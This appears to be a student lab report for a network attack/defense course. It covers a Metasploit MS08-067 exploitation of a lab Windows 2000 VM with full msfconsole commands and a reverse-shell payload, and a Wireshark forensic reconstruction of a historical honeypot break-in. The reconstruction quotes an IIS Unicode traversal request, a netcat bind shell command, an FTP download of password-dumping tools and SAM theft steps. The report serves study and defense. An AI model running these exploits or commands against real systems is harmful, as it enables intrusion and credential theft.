20252901 2025-2026-2 《网络攻防实践》实践六报告

20252901 程宇 2025-2026-2 《网络攻防实践》实践六报告

一、实践内容概述

本次实验围绕 Windows 操作系统安全攻防展开,核心完成以下三大实践任务:

  • Metasploit Windows 远程渗透攻击:使用 Metasploit 渗透测试框架,针对 Windows 靶机的 MS08-067 漏洞发起远程渗透攻击,成功获取靶机系统的访问权限与完全控制权。

  • NT 系统攻击流量取证分析:基于 Wireshark 分析攻击捕获日志 snort-0204@0117.log,完整还原攻击者 IP 212.116.251.162 对蜜罐主机 172.16.1.106(lab.wiretrip.net)的攻击全流程,解答核心取证分析问题。

  • 攻防团队对抗实践:分为攻方与守方双角色,攻方通过 Metasploit 发起渗透攻击获取靶机控制权,使用 Wireshark 监听全量网络流量,还原攻击过程、提取攻击特征。

二、实践过程

2.1 实验环境配置

本次实验基于 VMware 虚拟化环境搭建,所有虚拟机处于同一网段,实验前已完成网络连通性校验与基础环境配置,虚拟机角色与 IP 分配如下:

注意:关于 Win2kserver 的网络配置请参考「实验过程中遇到的问题及解决方案」。

虚拟机名称 操作系统 IP 地址 实验角色
Kali Kali Linux 192.168.200.3 核心攻击机、流量分析节点
Win2kserver Windows 2000 192.168.200.8 渗透靶机、防守方流量监听节点
SeedUbuntu9 Ubuntu 192.168.200.6 备用攻击机、辅助分析节点

2.2 实践一:Metasploit Windows 远程渗透攻击

实验目标

使用 Metasploit 渗透测试框架,针对 Windows 靶机的 MS08-067 漏洞发起远程渗透攻击,成功获取靶机系统的访问权限与完全控制权。

详细操作步骤

启动 Metasploit 框架

在 Kali 攻击机中切换至 root 权限,启动 Metasploit 依赖的 PostgreSQL 数据库,完成数据库初始化后进入 msfconsole 控制台:

service postgresql start
msfdb init
msfconsole

image

成功进入 Metasploit 控制台,界面显示框架版本、漏洞利用模块、载荷模块等基础信息,控制台提示符切换为 msf >

搜索并加载 MS08-067 漏洞利用模块

MS08-067 是 Windows Server 服务 SMB 协议的远程代码执行漏洞,可针对 Windows 2000/XP 系统实现无权限远程渗透。在控制台中执行搜索命令,定位目标漏洞模块:

search ms08_067

image

搜索结果显示目标漏洞模块路径为 exploit/windows/smb/ms08_067_netapi,漏洞评级为 Great,支持目标系统自动检测。执行 use 命令加载该模块:

use exploit/windows/smb/ms08_067_netapi

image

模块加载成功后,控制台提示符切换为 msf6 exploit(windows/smb/ms08_067_netapi) >

配置攻击模块与载荷参数

首先执行 show options 命令,查看漏洞模块的必填配置项,核心必填参数包括靶机地址 RHOSTS、SMB 服务端口 RPORT(默认 445);为规避防火墙入站限制,选择反向 TCP Shell 载荷,让靶机主动回连攻击机。
image

# 设置攻击载荷为反向 TCP Shell
set payload generic/shell_reverse_tcp

# 配置核心 IP 参数
set RHOSTS 192.168.200.8
set LHOST 192.168.200.3

# 设置目标系统为自动识别模式
set TARGET 0

image

配置完成后,再次执行 show options,确认所有参数配置无误,IP 地址与实验环境匹配。

执行渗透攻击并验证结果

参数校验完成后,执行 exploit 命令发起渗透攻击:

exploit

image

控制台输出攻击执行日志:

  • 自动在 192.168.200.3:4444 启动反向 TCP 监听器
  • 对靶机 192.168.200.8:445 进行系统指纹识别,匹配为 Windows 2K - Service Pack 0 系统
  • 触发 MS08-067 缓冲区溢出漏洞
  • 最终输出 Command shell session 1 opened (192.168.200.3:4444 → 192.168.200.8:1041),表明攻击成功,已建立与靶机的 Shell 会话

image

从 Wireshark 中可以查看此次攻击的完整流量数据。

2.3 实践二:取证分析实践——解码一次成功的 NT 系统破解攻击

实验目标

基于 Wireshark 分析攻击捕获日志 snort-0204@0117.log,完整还原攻击者 IP 212.116.251.162 对蜜罐主机 172.16.1.106(lab.wiretrip.net)的攻击全流程,解答核心取证分析问题。

分析准备

在 Kali 中通过 Wireshark 打开 snort-0204@0117.log 流量文件(日志在学习通第六章的压缩包里),通过筛选攻击链路流量,核心分析对象为 HTTP、TCP、FTP 协议的恶意数据包。

攻击全流程分析与问题解答

攻击链路基础流量筛选

首先通过 Wireshark 显示过滤器锁定攻击者与靶机之间的 HTTP 通信流量,过滤规则为:

ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106 && http

image

成功筛选出攻击者与靶机之间的所有 HTTP 交互数据包,为后续漏洞行为分析划定了核心分析范围。

漏洞探测阶段:IIS Unicode 编码目录遍历漏洞利用

对筛选后的 HTTP 流量进行 TCP 流跟踪分析,重点分析 tcp.stream eq 7 的数据流。

image

从跟踪的 HTTP 流中可发现,攻击者构造了包含特殊 Unicode 编码字符 %C0%AF 的恶意 GET 请求,完整请求内容为:

GET /guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../boot.ini HTTP/1.1

其中 %C0%AF 为 Unicode 编码的斜杠 /,攻击者利用 IIS 4.0 的 Unicode 编码解析漏洞,绕过目录访问限制,实现跨目录遍历,成功读取了靶机 Windows NT 系统的启动配置文件 boot.ini,确认了靶机的操作系统版本、系统架构等核心信息,同时验证了目标存在 Unicode 编码高危漏洞,为后续攻击奠定了基础。

漏洞利用阶段:MDAC RDS 远程代码执行漏洞攻击

完成漏洞探测后,攻击者针对靶机 IIS 服务的 MDAC RDS 漏洞发起攻击,通过两步完成恶意代码植入:

RDS 漏洞特征定位

通过显示过滤器 http.request.uri contains "msadc" 对流量进行筛选。

image

成功定位到大量针对 msadcs.dll 的 HTTP 请求,该文件为 IIS RDS 服务的核心组件,也是本次攻击的核心利用目标。

恶意请求与攻击工具确认

tcp.stream eq 11 的 TCP 数据流进行跟踪分析。

image

从数据流中可发现,攻击者构造了包含 SQL 注入语句的 POST 请求,请求中包含特征字符串 !ADM!ROX!YOUR!WORLD!,同时针对 /msadc/msadcs.dll/AdvancedDataFactory.Query 接口发起恶意调用。

经特征匹配与漏洞库关联,确认攻击者使用了 rain forest puppy 编写的 msadc(2).pl 渗透攻击工具,该工具专门针对 Windows IIS 系统的 MDAC RDS 漏洞发起攻击,通过 SQL 注入实现远程命令执行,为后续植入恶意工具、获取系统权限提供了入口。

权限获取阶段:反向 Shell 配置与恶意工具下载

通过 RDS 漏洞获得远程代码执行权限后,攻击者开展了反向 Shell 配置与恶意工具下载操作,完成对靶机的持久化控制。

反向 Shell 端口配置

tcp.stream eq 109 的数据流进行筛选。

image

选中编号为 1233 的数据包,右键选择「Follow → HTTP Stream」跟踪完整 HTTP 流。

image
image

从跟踪的 HTTP 流中可发现,攻击者通过恶意请求植入了 nc -l -p 6969 -e cmd1.exe 命令,该命令通过 netcat 工具在靶机的 6969 端口开启监听,绑定系统 cmd 命令行程序,实现反向 Shell 功能,为攻击者提供了靶机的交互式命令行控制权限。

FTP 恶意工具下载

为实现权限提升与口令窃取,攻击者通过 FTP 协议从远程服务器下载恶意工具,对 tcp.stream eq 106 的 TCP 数据流进行跟踪分析。

image
image

从数据流中可发现,攻击者通过构造的 ftpcom 脚本,连接远程 FTP 服务器 www.nether.net,使用用户名 johna2k、密码 haxedj00 完成登录认证,成功从服务器下载了:

  • nc.exe(netcat 工具)
  • pdump.exesamdump.dll(Windows 系统口令提取工具)

三个恶意文件,为后续的权限提升、口令窃取操作提供了工具支撑。流量分析显示,直至数据包编号 1106,攻击者完成 FTP 登录并成功完成所有文件的下载。

image

攻击后操作阶段:系统操作与蜜罐识别

攻击者获得靶机完整控制权后,开展了一系列系统操作,同时识别出了靶机的蜜罐属性。对 tcp.stream eq 178 的 TCP 数据流进行跟踪分析。

image

从跟踪的数据流中,可完整还原攻击者获得权限后的核心操作:

  1. 执行 net sessionnet usersnet groupnet localgroup 等系统命令,枚举靶机的本地用户、用户组与会话信息,尝试获取本地管理员权限
  2. 借助提前下载的 pdump.exesamdump.dll 工具,提取 Windows 注册表 SAM 数据库中的账号密码密文,同时执行 rdisk -/s 命令创建 SAM 口令文件备份,并将其保存为 c:\har.txt,完成系统账号口令的窃取
  3. 执行 del 命令删除上传的 samdump.dllpdump.exe 等工具文件,清理攻击痕迹
  4. 遍历靶机文件系统后,执行 echo best honeypot i've seen till now :) > rfp.txt 命令,在靶机根目录创建文本文件,明确标记该目标为蜜罐主机,确认攻击者已识别出靶机的蜜罐属性

核心取证问题解答

1. 攻击者使用了什么破解工具进行攻击?

攻击者使用了 rain forest puppy 编写的 msadc(2).pl 渗透攻击工具,该工具专门针对 Windows IIS 系统的 MDAC RDS 漏洞发起攻击。

2. 攻击者如何使用这个破解工具进入并控制了系统?

攻击者分两个核心阶段完成了对靶机的入侵与系统控制:

  • 踩点与漏洞探测阶段:攻击者利用 IIS 4.0 的 Unicode 编码漏洞(%C0%AF 为 Unicode 编码的 /),构造恶意 GET 请求实现目录遍历,成功读取靶机 boot.ini 系统启动配置文件,确认目标为 Windows NT 系统、Web 服务为 IIS 4.0,同时验证了目标存在 Unicode 目录遍历与 MDAC RDS 远程代码执行两个高危漏洞,完成了攻击前的信息收集与漏洞验证。

  • 漏洞利用与权限获取阶段:攻击者使用 msadc(2).pl 渗透工具,针对 IIS 服务的 msadcs.dll 组件发起 RDS 漏洞攻击,通过 SQL 注入植入系统命令实现远程代码执行;随后通过 FTP 协议从远程服务器下载 nc.exepdump.exesamdump.dll 等恶意工具;最终通过 nc -l -p 6969 -e cmd1.exe 命令在靶机开启 6969 端口的反向 Shell,成功获得靶机的交互式访问权限,完成对系统的完全控制。

3. 攻击者获得系统访问权限后做了什么?

攻击者获得靶机 Shell 访问权限后,开展了四类核心操作:

  • 系统信息枚举与权限提升尝试:执行 net sessionnet usersnet groupnet localgroup 等多条系统命令,枚举靶机的本地用户、用户组与会话信息,梳理系统权限架构,尝试获取本地管理员最高权限

  • 系统账号口令窃取:借助提前下载的 pdump.exesamdump.dll 工具,提取 Windows 注册表 SAM 数据库中的账号密码密文,同时执行 rdisk -/s 命令创建 SAM 口令文件备份,将其保存为 c:\har.txt,完成对靶机系统账号口令的窃取

  • 攻击痕迹清理:执行 del 命令删除上传至靶机的 samdump.dllpdump.exe 等恶意工具文件,消除攻击留存的痕迹

  • 蜜罐识别与标记:遍历靶机文件系统后,识别出目标的蜜罐属性,执行 echo best honeypot i've seen till now :) > rfp.txt 命令,在靶机中创建文件完成蜜罐标记

4. 我们如何防止这样的攻击?

针对本次攻击利用的漏洞、攻击手法与完整攻击链路,可采取以下分层防御措施:

  • 漏洞闭环管理:及时安装 Windows 系统与 IIS 服务的官方安全补丁,重点修复 Unicode 目录遍历、MDAC RDS 远程代码执行等高危漏洞,从根源上关闭攻击面;定期开展漏洞扫描,对 Web 服务、系统组件进行常态化漏洞检测,实现漏洞的及时发现与修复。

  • 攻击面收敛:禁用系统内闲置的 RDS、FTP、SMB 等高危服务,关闭 IIS 服务中不必要的组件与扩展,仅保留业务必需的功能模块,减少可被利用的攻击入口;严格限制 Web 服务目录的访问权限,禁止跨目录访问行为。

  • 网络边界防护:通过防火墙配置 ACL 访问控制策略,限制互联网对服务器 80、21、139、445 等高危端口的访问,同时配置内网边界规则,封禁内网服务器主动向互联网发起的非正常外联连接,阻断反向 Shell 回连、恶意工具下载等攻击行为。

  • 入侵检测与审计:部署 IDS/IPS 入侵检测与防御系统,配置针对 Unicode 编码恶意请求、RDS 漏洞利用的检测规则,实时监控并阻断恶意攻击流量;定期审计系统日志、Web 服务访问日志,及时发现异常访问与攻击行为,实现攻击的早发现、早处置。

  • 最小权限配置:遵循权限最小化原则,降低 Web 服务运行账号的系统权限,禁止 Web 服务账号执行系统命令、访问 SAM 数据库、修改系统配置等敏感操作,即使 Web 服务漏洞被利用,也无法直接获取系统高权限,降低攻击造成的危害。

5. 你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?

攻击者已经明确警觉到目标是一台蜜罐主机,且通过流量中的明文操作完成了蜜罐标记。

核心直接证据:在 tcp.stream eq 178 的 TCP 数据流中,攻击者执行了 echo best honeypot i've seen till now :) > rfp.txt 命令,直接在靶机的系统根目录中写入了标记蜜罐的文本内容,明确表明其已识别出目标的蜜罐属性。

攻击者识别蜜罐的核心原因:该靶机为 rain forest puppy 部署的开源蜜罐,与正常业务服务器存在显著的特征差异:

  1. 靶机使用的 IIS 4.0 服务保留了已公开多年的 RDS、Unicode 编码等高危漏洞,且未安装任何安全补丁,不符合正常业务服务器的安全配置规范
  2. 靶机系统中留存了大量渗透测试工具、漏洞样本与攻击脚本目录,与正常业务服务器的文件系统特征完全不符
  3. 靶机对攻击者的恶意攻击行为未做任何拦截与响应,完全放任攻击者完成漏洞利用、工具下载、权限获取全流程,进一步让攻击者确认了目标的蜜罐属性

2.4 实践三:团队对抗实践——Windows 系统远程渗透攻击与流量分析

实验目标

分为攻方与守方双角色,攻方通过 Metasploit 发起渗透攻击获取靶机控制权,Wireshark 监听全量网络流量,守方验证攻击结果,还原攻击过程、提取攻击特征。

对抗环境配置

注意:攻守双方的网络需要均设置成桥接模式。

  • 攻方:Kali 虚拟机(我),IP 地址 192.168.123.95,使用 MS08-067 漏洞发起攻击;开启 Wireshark 全流量监听
  • 守方:Win2Kserver 虚拟机(赵yx),IP 地址 192.168.123.39,作为被攻击靶机;两台虚拟机均设置为桥接模式,确保守方可完整捕获攻方的二层/三层攻击流量

攻方攻击执行

攻方复现渗透攻击流程,通过 Metasploit 加载 MS08-067 漏洞模块,配置靶机 IP 192.168.123.39、攻击机监听 IP 192.168.123.95,选择反向 TCP Shell 载荷,执行 exploit 成功获取靶机控制权,在靶机中创建文件夹,完成攻击动作。

msfconsole

# 沿用 MS08-067 漏洞利用模块,完成攻击参数配置
use windows/smb/ms08_067_netapi

# 设置反向 TCP Shell 载荷
set payload windows/shell_reverse_tcp

# 设置靶机 IP
set RHOSTS 192.168.123.39

# 设置攻击机 IP
set LHOST 192.168.123.95

# 发起攻击
exploit

ipconfig

# 在靶机中新建文件夹
md 20252901

image
image

在 Win2k 中的对应路径下可以找到新建立的文件夹。

image

流量监听与攻击还原

启动 Wireshark 本地网卡全流量捕获,攻击完成后对数据包进行深度分析,完整还原攻击全流程:

攻击链路定位

通过筛选规则 ip.addr == 192.168.123.39 and ip.addr == 192.168.123.95,定位攻击机与靶机的完整会话,核心攻击流量集中在 TCP 445 端口(SMB 协议)。
image

TCP 连接建立阶段

捕获到攻方 192.168.123.95 向靶机 445 端口发起的 TCP 三次握手(SYN、SYN-ACK、ACK),完成 SMB 协议的传输层连接建立。

SMB 漏洞利用阶段

捕获到 SMB 协议的协议协商、会话建立、树连接的完整交互过程,攻方通过 SMB 管道访问靶机 BROWSER 服务,随后发送畸形的 SMB NetAPI 请求,触发 MS08-067 缓冲区溢出漏洞。

反向 Shell 会话阶段

捕获到靶机 192.168.123.39 向攻击机 192.168.123.95 的 4444 端口发起的 TCP 回连,这是反向载荷触发的核心特征;后续数据包中包含 ipconfigmkdir 等 CMD 命令的明文交互内容,完整还原了攻方的后续操作。

image

攻击特征提取

通过流量分析,总结本次攻击的核心检测特征:针对 445 端口的 SMB 连接、畸形的 NetAPI 请求、靶机向攻击机高位端口的反向 TCP 主动连接,可作为后续入侵检测的核心规则。

三、学习中遇到的问题

问题:MS08-067 攻击失败

执行 exploit 命令后,提示 Exploit completed, but no session was created,攻击未成功建立会话。

解决方案:我最开始使用的是 Windows XP SP3,无论如何都无法成功。怀疑是漏洞已经被修复,因此修改成 Win2Kserver 进行实验。

把 Win2kserver 设置成同一网段后,执行以下操作:

  1. 点击「开始」→「网络和拨号连接」→「本地连接」
  2. 右键「属性」→「Internet 协议(TCP/IP)」
  3. 将「使用下面的 IP 地址」改成「自动获得 IP 地址」

image

修改后重启win2k即设置完成。

四、实践总结

本次实验围绕 Windows 操作系统安全攻防展开,通过 Metasploit 远程渗透攻击、NT 系统攻击流量取证分析、攻防团队对抗三大实践任务,我完成了从漏洞利用理论到攻防实操的完整落地,彻底打破了此前对 Windows 系统"默认安全"的认知误区,对系统漏洞的危害性、攻击链的复杂性、攻防一体的防护理念有了更直观、更深刻的理解。

Metasploit 实践让我深入理解了 MS08-067 漏洞的攻击原理与利用方式,体验了自动化渗透测试框架的强大功能;取证分析实践让我掌握了流量溯源、攻击还原的核心方法,学会了从数据包中提取攻击特征、还原攻击链路的完整技能;团队对抗实践则让我从攻防双视角理解了攻击与防御的博弈关系,深刻体会到"知己知彼,百战不殆"的重要性。

本次实验只是系统安全攻防学习的起点,后续我会继续深入学习更复杂的攻防技术,从基础漏洞利用,逐步拓展到内网渗透、APT 攻击检测等领域,把所学技术用于合法的网络安全防护工作中。

参考资料

posted @ 2026-04-16 14:01  行走的yu  阅读(139)  评论(0)    收藏  举报